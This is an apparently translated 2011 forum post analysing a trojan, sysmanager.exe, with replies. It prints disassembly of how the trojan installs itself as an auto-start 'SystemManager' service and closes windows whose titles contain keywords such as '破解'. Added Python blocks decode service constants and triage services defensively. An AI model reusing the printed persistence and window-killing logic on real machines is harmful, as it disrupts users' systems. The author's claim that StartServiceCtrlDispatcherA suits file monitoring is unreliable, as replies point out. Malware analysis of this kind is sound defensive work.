[Original] Reverse analysis of sysmanager.exe
2011-7-15 20:23 8273

For the past few days my computer has been unusually slow for no obvious reason, and some web pages would close the browser right after they opened, which was very frustrating. I ran an antivirus scan and it found nothing at all... So, annoyed, I decided that manual removal was the more reliable route. Since the pages that got closed all contained words like 破解 (crack) and 逆向 (reverse), I suspected the thing was working off keywords, so I created a file named "逆向破解.txt" and opened it in Notepad. Sure enough, it closed the moment it opened; opening it with EditPlus gave the same result, while opening it under a different file name worked normally.
      Since this happened to every process, my first suspicion was DLL injection, but comparing the DLLs of the two processes showed nothing unusual apart from the system DLLs, and an injected system DLL seemed unlikely, so I had to look elsewhere.
     I booted the machine into Safe Mode and looked at the process list, then booted normally and looked at the process list again, and then ruled the processes out one by one.
      After repeated testing I pinned it down to sysmanager.exe: killing that process made everything run normally. A Baidu search for the process name confirmed it is a trojan. I cleaned the registry, deleted the program, and done: virus removed!!!
     It should have ended there, but I had nothing else to do at the time, and this thing had annoyed me to no end!!! So I decided to analyze it anyway.
    PEiD packer check: Microsoft Visual C++ 6.0
    Good news; on to IDA + OllyDbg.
int __stdcall WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd)
.text:004014F0 _WinMain@16     proc near               ; CODE XREF: start+12Fp
.text:004014F0
.text:004014F0 ServiceStartTable= SERVICE_TABLE_ENTRYA ptr -10h
.text:004014F0 var_8           = dword ptr -8
.text:004014F0 var_4           = dword ptr -4
.text:004014F0 hInstance       = dword ptr  4
.text:004014F0 hPrevInstance   = dword ptr  8
.text:004014F0 Str1            = dword ptr  0Ch
.text:004014F0 nShowCmd        = dword ptr  10h
.text:004014F0
.text:004014F0                 sub     esp, 10h
.text:004014F3                 call    sub_401000
.text:004014F8                 call    ds:GetCurrentThreadId
.text:004014FE                 mov     dword_403068, eax
.text:00401503                 xor     eax, eax
.text:00401505                 mov     [esp+10h+var_8], eax
.text:00401509                 mov     [esp+10h+var_4], eax
.text:0040150D                 mov     eax, [esp+10h+Str1]
// check whether this is the uninstall command; if so, delete the service and uninstall the program
.text:00401511                 push    offset Str2     ; "/uninstall"
.text:00401516                 push    eax             ; Str1
.text:00401517                 mov     [esp+18h+ServiceStartTable.lpServiceName], offset ServiceName ; "SystemManager"
.text:0040151F                 mov     [esp+18h+ServiceStartTable.lpServiceProc], offset loc_401450
.text:00401527                 call    ds:_stricmp
.text:0040152D                 add     esp, 8
.text:00401530                 test    eax, eax
.text:00401532                 jnz     short loc_401541
.text:00401534                 call    sub_401220
.text:00401539                 xor     eax, eax
.text:0040153B                 add     esp, 10h
.text:0040153E                 retn    10h
.text:00401541 ; ---------------------------------------------------------------------------
.text:00401541
.text:00401541 loc_401541:                             ; CODE XREF: WinMain(x,x,x,x)+42j
.text:00401541                 call    sub_401040
.text:00401546                 lea     ecx, [esp+10h+ServiceStartTable]
// use of StartServiceCtrlDispatcherA
// for every newly created process, create a thread that performs the check
.text:0040154A                 push    ecx             ; lpServiceStartTable
.text:0040154B                 call    ds:StartServiceCtrlDispatcherA
.text:00401551                 xor     eax, eax
.text:00401553                 add     esp, 10h
.text:00401556                 retn    10h
.text:00401556 _WinMain@16     endp



typedef struct _SERVICE_TABLE_ENTRY {
  LPTSTR lpServiceName;
  LPSERVICE_MAIN_FUNCTION lpServiceProc;
} SERVICE_TABLE_ENTRY, *LPSERVICE_TABLE_ENTRY;
// here lpServiceName = "SystemManager" and lpServiceProc = loc_401450 (0x00401450)


// copy sysmanager.exe into the system directory and create an auto-start service
.text:00401040                 sub     esp, 220h
.text:00401046                 lea     eax, [esp+220h+NewFileName]
.text:0040104A                 push    ebx
.text:0040104B                 push    esi
.text:0040104C                 push    edi
.text:0040104D                 push    100h            ; uSize
.text:00401052                 push    eax             ; lpBuffer
.text:00401053                 call    ds:GetSystemDirectoryA
.text:00401059                 mov     edi, offset aSysmanager_exe ; "\\sysmanager.exe"
.text:0040105E                 or      ecx, 0FFFFFFFFh
.text:00401061                 xor     eax, eax
.text:00401063                 lea     edx, [esp+22Ch+NewFileName]
.text:00401067                 repne scasb
.text:00401069                 not     ecx
.text:0040106B                 sub     edi, ecx
.text:0040106D                 push    104h            ; nSize
.text:00401072                 mov     esi, edi
.text:00401074                 mov     ebx, ecx
.text:00401076                 mov     edi, edx
.text:00401078                 or      ecx, 0FFFFFFFFh
.text:0040107B                 repne scasb
.text:0040107D                 mov     ecx, ebx
.text:0040107F                 dec     edi
.text:00401080                 shr     ecx, 2
.text:00401083                 rep movsd
.text:00401085                 mov     ecx, ebx
.text:00401087                 lea     eax, [esp+230h+ExistingFileName]
.text:0040108E                 and     ecx, 3
.text:00401091                 push    eax             ; lpFilename
.text:00401092                 rep movsb
.text:00401094                 push    0               ; hModule
// get the program's own file name
.text:00401096                 call    ds:GetModuleFileNameA
.text:0040109C                 lea     ecx, [esp+22Ch+NewFileName]
.text:004010A0                 push    0               ; bFailIfExists
.text:004010A2                 lea     edx, [esp+230h+ExistingFileName]
.text:004010A9                 push    ecx             ; lpNewFileName
.text:004010AA                 push    edx             ; lpExistingFileName
// copy the file
.text:004010AB                 call    ds:CopyFileA
.text:004010B1                 test    eax, eax
.text:004010B3                 jnz     short loc_4010BF
.text:004010B5                 pop     edi
.text:004010B6                 pop     esi
.text:004010B7                 pop     ebx
.text:004010B8                 add     esp, 220h
.text:004010BE                 retn
.text:004010BF ; ---------------------------------------------------------------------------
.text:004010BF
.text:004010BF loc_4010BF:                             ; CODE XREF: sub_401040+73j
.text:004010BF                 push    0F003Fh         ; dwDesiredAccess
.text:004010C4                 push    0               ; lpDatabaseName
.text:004010C6                 push    0               ; lpMachineName
// open the service control manager
.text:004010C8                 call    ds:OpenSCManagerA
.text:004010CE                 test    eax, eax
.text:004010D0                 mov     hSCObject, eax
.text:004010D5                 jnz     short loc_4010E1
.text:004010D7                 pop     edi
.text:004010D8                 pop     esi
.text:004010D9                 pop     ebx
.text:004010DA                 add     esp, 220h
.text:004010E0                 retn
.text:004010E1 ; ---------------------------------------------------------------------------
.text:004010E1
.text:004010E1 loc_4010E1:                             ; CODE XREF: sub_401040+95j
.text:004010E1                 push    0               ; lpPassword
.text:004010E3                 push    0               ; lpServiceStartName
.text:004010E5                 push    offset Dependencies ; lpDependencies
.text:004010EA                 push    0               ; lpdwTagId
.text:004010EC                 lea     ecx, [esp+23Ch+NewFileName]
.text:004010F0                 push    0               ; lpLoadOrderGroup
.text:004010F2                 push    ecx             ; lpBinaryPathName
.text:004010F3                 mov     ebx, 2
.text:004010F8                 push    1               ; dwErrorControl
.text:004010FA                 push    ebx             ; dwStartType
.text:004010FB                 push    110h            ; dwServiceType
.text:00401100                 push    0F01FFh         ; dwDesiredAccess
.text:00401105                 push    offset ServiceName ; "SystemManager"
.text:0040110A                 push    offset ServiceName ; "SystemManager"
.text:0040110F                 push    eax             ; hSCManage
// create the service
.text:00401110                 call    ds:CreateServiceA
.text:00401116                 mov     esi, ds:GetLastError
.text:0040111C                 mov     dword_403060, eax
.text:00401121                 test    eax, eax
.text:00401123                 jnz     short loc_40117C
.text:00401125                 call    esi ; GetLastError
.text:00401127                 cmp     eax, 431h
.text:0040112C                 jz      short loc_401147
.text:0040112E                 mov     edx, hSCObject
.text:00401134                 push    edx             ; hSCObject
.text:00401135                 call    ds:CloseServiceHandle
.text:0040113B                 pop     edi
.text:0040113C                 pop     esi
.text:0040113D                 xor     eax, eax
.text:0040113F                 pop     ebx
.text:00401140                 add     esp, 220h
.text:00401146                 retn
.text:00401147 ; ---------------------------------------------------------------------------
.text:00401147
.text:00401147 loc_401147:                             ; CODE XREF: sub_401040+ECj
.text:00401147                 mov     eax, hSCObject
.text:0040114C                 push    10h             ; dwDesiredAccess
.text:0040114E                 push    offset ServiceName ; "SystemManager"
.text:00401153                 push    eax             ; hSCManager
// open the existing service
.text:00401154                 call    ds:OpenServiceA
.text:0040115A                 test    eax, eax
.text:0040115C                 mov     dword_403060, eax
.text:00401161                 jnz     short loc_40117C
.text:00401163                 mov     ecx, hSCObject
.text:00401169                 push    ecx             ; hSCObject
.text:0040116A                 call    ds:CloseServiceHandle
.text:00401170                 pop     edi
.text:00401171                 pop     esi
.text:00401172                 xor     eax, eax
.text:00401174                 pop     ebx
.text:00401175                 add     esp, 220h
.text:0040117B                 retn


// delete the service (the /uninstall path)
sub_401220      proc near               ; CODE XREF: WinMain(x,x,x,x)+44p
.text:00401220                 push    esi
.text:00401221                 push    0F003Fh         ; dwDesiredAccess
.text:00401226                 push    0               ; lpDatabaseName
.text:00401228                 push    0               ; lpMachineName
.text:0040122A                 call    ds:OpenSCManagerA
.text:00401230                 test    eax, eax
.text:00401232                 mov     hSCObject, eax
.text:00401237                 jz      loc_4012C3
.text:0040123D                 push    0F01FFh         ; dwDesiredAccess
.text:00401242                 push    offset ServiceName ; "SystemManager"
.text:00401247                 push    eax             ; hSCManager
.text:00401248                 call    ds:OpenServiceA
.text:0040124E                 test    eax, eax
.text:00401250                 mov     dword_403060, eax
.text:00401255                 jz      short loc_4012C3
.text:00401257                 push    offset ServiceStatus ; lpServiceStatus
.text:0040125C                 push    eax             ; hService
.text:0040125D                 call    ds:QueryServiceStatus
.text:00401263                 cmp     ServiceStatus.dwCurrentState, 4
.text:0040126A                 jnz     short loc_40127F
.text:0040126C                 mov     eax, dword_403060
.text:00401271                 push    offset ServiceStatus ; lpServiceStatus
.text:00401276                 push    1               ; dwControl
.text:00401278                 push    eax             ; hService
.text:00401279                 call    ds:ControlService
.text:0040127F
.text:0040127F loc_40127F:                             ; CODE XREF: sub_401220+4Aj
.text:0040127F                 mov     ecx, dword_403060
.text:00401285                 push    ecx             ; hService
.text:00401286                 call    ds:DeleteService
.text:0040128C                 test    eax, eax
.text:0040128E                 jz      short loc_4012AB
.text:00401290                 mov     edx, hSCObject
.text:00401296                 mov     esi, ds:CloseServiceHandle
.text:0040129C                 push    edx             ; hSCObject
.text:0040129D                 call    esi ; CloseServiceHandle
.text:0040129F                 mov     eax, dword_403060
.text:004012A4                 push    eax             ; hSCObject
.text:004012A5                 call    esi ; CloseServiceHandle
.text:004012A7                 xor     eax, eax
.text:004012A9                 pop     esi
.text:004012AA                 retn
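As an added example (not part of the original post and not code from the sample), the script below decodes the constants that sub_401040 and sub_401220 hand to the service control manager (the 110h service type, start type 2, the 431h error the installer tolerates, and the state 4 / control 1 values on the uninstall path) and then triages a constructed list of service records, the kind one would export with `sc query` or read from HKLM\SYSTEM\CurrentControlSet\Services, for the same persistence pattern. The winsvc.h names and values are the standard ones; the baseline set and the sample records are constructed for the demonstration.

```python
# Added example, not from the original post: decode the service-control
# constants seen in sub_401040 / sub_401220 and triage constructed service
# records for the installer's persistence pattern.
from dataclasses import dataclass
from typing import Dict, List
import ntpath

# dwServiceType bits (winsvc.h)
SERVICE_TYPE_BITS = {
    0x001: "SERVICE_KERNEL_DRIVER",
    0x002: "SERVICE_FILE_SYSTEM_DRIVER",
    0x010: "SERVICE_WIN32_OWN_PROCESS",
    0x020: "SERVICE_WIN32_SHARE_PROCESS",
    0x100: "SERVICE_INTERACTIVE_PROCESS",
}
START_TYPES = {0: "SERVICE_BOOT_START", 1: "SERVICE_SYSTEM_START",
               2: "SERVICE_AUTO_START", 3: "SERVICE_DEMAND_START",
               4: "SERVICE_DISABLED"}
# SERVICE_STATUS.dwCurrentState values compared against 4 in sub_401220
CURRENT_STATES = {1: "SERVICE_STOPPED", 2: "SERVICE_START_PENDING",
                  3: "SERVICE_STOP_PENDING", 4: "SERVICE_RUNNING",
                  5: "SERVICE_CONTINUE_PENDING", 6: "SERVICE_PAUSE_PENDING",
                  7: "SERVICE_PAUSED"}
# dwControl passed to ControlService (1 in the listing)
CONTROL_CODES = {1: "SERVICE_CONTROL_STOP", 2: "SERVICE_CONTROL_PAUSE",
                 3: "SERVICE_CONTROL_CONTINUE", 4: "SERVICE_CONTROL_INTERROGATE"}
# 431h = 1073: the only CreateServiceA failure the installer tolerates
ERROR_SERVICE_EXISTS = 0x431


def decode_service_type(value: int) -> List[str]:
    """Expand a dwServiceType bit mask into winsvc.h names."""
    names = [name for bit, name in SERVICE_TYPE_BITS.items() if value & bit]
    leftover = value & ~sum(SERVICE_TYPE_BITS)
    if leftover:
        names.append(f"UNKNOWN_0x{leftover:X}")
    return names


def decode_create_service_call(service_type: int, start_type: int) -> dict:
    """Summarise the CreateServiceA arguments visible in the listing."""
    return {"service_type": decode_service_type(service_type),
            "start_type": START_TYPES.get(start_type, f"UNKNOWN_{start_type}")}


@dataclass
class ServiceRecord:
    name: str
    service_type: int
    start_type: int
    image_path: str  # executable path without arguments


# Constructed baseline of service names expected on the host. In practice it
# comes from a clean reference image, never from the machine being examined.
BASELINE = {"eventlog", "spooler", "dnscache", "lanmanserver"}


def triage(records: List[ServiceRecord]) -> Dict[str, List[str]]:
    """Return {service name: reasons} for services matching the installer's pattern."""
    findings: Dict[str, List[str]] = {}
    for rec in records:
        reasons = []
        if rec.name.lower() not in BASELINE:
            if rec.start_type == 2:
                reasons.append("auto-start service not in baseline")
            if rec.service_type & 0x100 and rec.service_type & 0x010:
                reasons.append("interactive own-process service not in baseline")
        exe = ntpath.basename(rec.image_path.strip('"')).lower()
        if exe == "sysmanager.exe" or rec.name.lower() == "systemmanager":
            reasons.append("matches the sysmanager.exe / SystemManager indicator")
        if reasons:
            findings[rec.name] = reasons
    return findings


if __name__ == "__main__":
    # Constructed records: the sample's service plus two benign ones.
    sample = [
        ServiceRecord("SystemManager", 0x110, 2, r"C:\WINDOWS\system32\sysmanager.exe"),
        ServiceRecord("Spooler", 0x110, 2, r"C:\WINDOWS\system32\spoolsv.exe"),
        ServiceRecord("Eventlog", 0x020, 2, r"C:\WINDOWS\system32\services.exe"),
    ]
    print(decode_create_service_call(0x110, 2))
    print(CURRENT_STATES[4], CONTROL_CODES[1], hex(ERROR_SERVICE_EXISTS))
    for name, why in triage(sample).items():
        print(name, "->", "; ".join(why))
```

The interactive/auto-start check alone is a weak signal (the print spooler on XP is also an interactive auto-start service), which is why the triage only raises it for names missing from a known-good baseline; the indicator match is the strong one.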



.text:00401450 loc_401450:                             ; DATA XREF: WinMain(x,x,x,x)+2Fo
.text:00401450                 push    offset sub_4012D0
.text:00401455                 push    offset ServiceName ; "SystemManager"
.text:0040145A                 mov     ServiceStatus.dwCurrentState, 2
.text:00401464                 mov     ServiceStatus.dwControlsAccepted, 3
.text:0040146E                 call    ds:RegisterServiceCtrlHandlerA
.text:00401474                 test    eax, eax
.text:00401476                 mov     hServiceStatus, eax
.text:0040147B                 jz      short locret_4014E4
.text:0040147D                 push    esi
.text:0040147E                 mov     esi, ds:SetServiceStatus
.text:00401484                 push    offset ServiceStatus
.text:00401489                 push    eax
.text:0040148A                 call    esi ; SetServiceStatus
.text:0040148C                 mov     eax, hServiceStatus
.text:00401491                 push    offset ServiceStatus
.text:00401496                 push    eax
.text:00401497
.text:00401497 __cfltcvt_init:
.text:00401497                 mov     ServiceStatus.dwWin32ExitCode, 0
.text:004014A1                 mov     ServiceStatus.dwCheckPoint, 0
.text:004014AB                 mov     ServiceStatus.dwWaitHint, 0
.text:004014B5                 mov     ServiceStatus.dwCurrentState, 4
.text:004014BF                 call    esi ; SetServiceStatus
.text:004014C1                 push    0
.text:004014C3                 push    0
.text:004014C5                 push    0
.text:004014C7                 push    offset sub_401380
.text:004014CC                 push    0
.text:004014CE                 push    0
.text:004014D0                 call    ds:CreateThread
.text:004014D6                 test    eax, eax
.text:004014D8                 pop     esi
.text:004014D9                 jz      short locret_4014E4
.text:004014DB                 push    0FFFFFFFFh
.text:004014DD                 push    eax
.text:004014DE                 call    ds:WaitForSingleObject
.text:004014E4
.text:004014E4 locret_4014E4:                          ; CODE XREF: .text:0040147Bj
.text:004014E4                                         ; .text:004014D9j
.text:004014E4                 retn


For every newly created process a thread is created; the thread function is sub_401380.

sub_401380      proc near               ; DATA XREF: .text:004014C7o
.text:00401380
.text:00401380 String          = byte ptr -104h
.text:00401380
.text:00401380                 sub     esp, 104h
.text:00401386                 push    ebx
.text:00401387                 mov     ebx, ds:_mbsstr
.text:0040138D                 push    esi
.text:0040138E                 push    edi
.text:0040138F
.text:0040138F loc_40138F:                             ; CODE XREF: sub_401380+47j
.text:0040138F                                         ; sub_401380+BEj
.text:0040138F                 push    3E8h            ; dwMilliseconds
.text:00401394                 call    ds:Sleep
.text:0040139A                 xor     eax, eax
.text:0040139C                 mov     ecx, 19h
.text:004013A1                 mov     edi, offset dword_403094
.text:004013A6                 push    eax             ; lParam
.text:004013A7                 rep stosd
.text:004013A9                 push    offset EnumFunc ; lpEnumFunc
.text:004013AE                 mov     dword_403224, 0
.text:004013B8                 call    ds:EnumWindows // enumerate the top-level windows
.text:004013BE                 mov     eax, dword_403224
.text:004013C3                 xor     edi, edi
.text:004013C5                 test    eax, eax
.text:004013C7                 jle     short loc_40138F
.text:004013C9                 mov     esi, offset dword_403094
.text:004013CE
.text:004013CE loc_4013CE:                             ; CODE XREF: sub_401380+BCj
.text:004013CE                 mov     eax, [esi]
.text:004013D0                 test    eax, eax
.text:004013D2                 jz      short loc_401431
.text:004013D4                 lea     ecx, [esp+110h+String]
.text:004013D8                 push    80h             ; nMaxCount
.text:004013DD                 push    ecx             ; lpString
.text:004013DE                 push    eax             ; hWnd
.text:004013DF                 call    ds:GetWindowTextA // get the window title
.text:004013E5                 test    eax, eax
.text:004013E7                 jz      short loc_401431
.text:004013E9                 lea     edx, [esp+110h+String]
.text:004013ED                 push    offset unk_403040
.text:004013F2                 push    edx
.text:004013F3                 call    ebx ; _mbsstr
.text:004013F5                 add     esp, 8
.text:004013F8                 test    eax, eax
.text:004013FA                 jnz     short loc_401422
.text:004013FC                 lea     eax, [esp+110h+String]
.text:00401400                 push    offset aI       ; "专用"
.text:00401405                 push    eax
.text:00401406                 call    ebx ; _mbsstr   // check for the keyword: 专用
.text:00401408                 add     esp, 8
.text:0040140B                 test    eax, eax
.text:0040140D                 jnz     short loc_401422
.text:0040140F                 lea     ecx, [esp+110h+String]
.text:00401413                 push    offset aT       ; "破解"
.text:00401418                 push    ecx
.text:00401419                 call    ebx ; _mbsstr  // check for the keyword: 破解
.text:0040141B                 add     esp, 8
.text:0040141E                 test    eax, eax
.text:00401420                 jz      short loc_401431
.text:00401422
.text:00401422 loc_401422:                             ; CODE XREF: sub_401380+7Aj
.text:00401422                                         ; sub_401380+8Dj
.text:00401422                 mov     edx, [esi]
.text:00401424                 push    0               ; lParam
.text:00401426                 push    0               ; wParam
.text:00401428                 push    10h             ; Msg
.text:0040142A                 push    edx             ; hWnd
.text:0040142B                 call    ds:SendMessageA   // send the message (WM_CLOSE, 10h) to close the process
.text:00401431
.text:00401431 loc_401431:                             ; CODE XREF: sub_401380+52j
.text:00401431                                         ; sub_401380+67j ...
.text:00401431                 mov     eax, dword_403224
.text:00401436                 inc     edi
.text:00401437                 add     esi, 4
.text:0040143A                 cmp     edi, eax
.text:0040143C                 jl      short loc_4013CE
.text:0040143E                 jmp     loc_40138F
.text:0040143E sub_401380      endp
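As an added example (not part of the original post and not the sample's code), here is a model of the per-window check in sub_401380, so a responder can predict which window titles the service would send WM_CLOSE to and can reproduce the author's "逆向破解.txt" test on paper. It returns decisions only and never touches windows. Only the two keyword strings visible in the listing ("专用" and "破解") are used; unk_403040 is a third string whose contents the post does not show. The GetWindowTextA model assumes a code page 936 (GBK) system, as the ANSI API with a 80h byte buffer implies, and assumes that a double-byte character cut by the buffer limit is dropped; the EnumWindows callback is not on the page, so every enumerated title is assumed to be checked.

```python
# Added example, not from the original post: model of the title filter in
# sub_401380 (GetWindowTextA with nMaxCount = 80h, then _mbsstr for each keyword).
from typing import List, Optional, Tuple

WM_CLOSE = 0x10           # Msg value pushed before SendMessageA
TITLE_NMAXCOUNT = 0x80    # nMaxCount passed to GetWindowTextA
# Keyword strings visible in the listing; unk_403040 is unknown and left out.
KEYWORDS = ("专用", "破解")


def captured_title(title: str, nmax: int = TITLE_NMAXCOUNT) -> str:
    """Model GetWindowTextA on a GBK (code page 936) system: the title arrives
    as GBK bytes and at most nmax-1 of them fit before the terminating NUL.
    Assumption: a double-byte character split by the limit is dropped."""
    raw = title.encode("gbk", errors="replace")[: nmax - 1]
    return raw.decode("gbk", errors="ignore")


def matched_keyword(title: str) -> Optional[str]:
    """_mbsstr is a plain, case-sensitive substring search; return the first hit
    in the same order the listing tests the strings."""
    text = captured_title(title)
    for keyword in KEYWORDS:
        if keyword in text:
            return keyword
    return None


def plan_pass(titles: List[str]) -> List[Tuple[str, str]]:
    """One iteration of the thread's loop: (title, keyword) for every window that
    would receive WM_CLOSE. Empty titles are skipped, because GetWindowTextA
    returning 0 jumps past the checks in the listing."""
    hits = []
    for title in titles:
        if not title:
            continue
        keyword = matched_keyword(title)
        if keyword is not None:
            hits.append((title, keyword))
    return hits


if __name__ == "__main__":
    # Constructed titles: the author's Notepad test, a benign window, a title
    # whose keyword sits beyond the 127-byte capture limit, and an empty title.
    sample_titles = ["逆向破解.txt - 记事本", "readme.txt - Notepad",
                     "x" * 130 + "破解", ""]
    for title, keyword in plan_pass(sample_titles):
        print(f"would send WM_CLOSE (0x{WM_CLOSE:X}) to {title!r}: matched {keyword!r}")
```

The third constructed title shows the filter's blind spot: because only 127 bytes of the title are captured, a keyword that appears later in a long title is never seen, which is also why the check is worth reproducing rather than guessing at when confirming an infection.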


Some thoughts:
That completes the analysis; I finally know the cause. Along the way I also learned a function, StartServiceCtrlDispatcherA. It's a nice function, ideal for file monitoring, and you can filter on keywords, for example blocking every web page that has to do with cracking and reversing. Good stuff, learned something.

Latest replies (6)
#2 achillis, 2011-7-15 20:26
StartServiceCtrlDispatcher is just a function related to service programs; it really has nothing to do with file monitoring...
#3 古越魂, 2011-7-15 20:48
What about keyword filtering like it does? Isn't that pretty neat too?
#4 swzices, 2011-7-25 12:15
Keyword filtering is really just enumerate + compare, then act. Nothing special about it, and StartServiceCtrlDispatcher, as 教主 said, is just a simple service control function~
#5 winsee, 2011-7-25 20:42
Getting hit by a trojan like this, you really are something.
#6 古越魂, 2011-7-28 20:50
I was debugging some little program, who knew it had this thing inside.... embarrassing
#7 zhaokang, 2011-9-6 15:10
Requesting the bin, I'd like to take a look and analyze it.. please post the bin..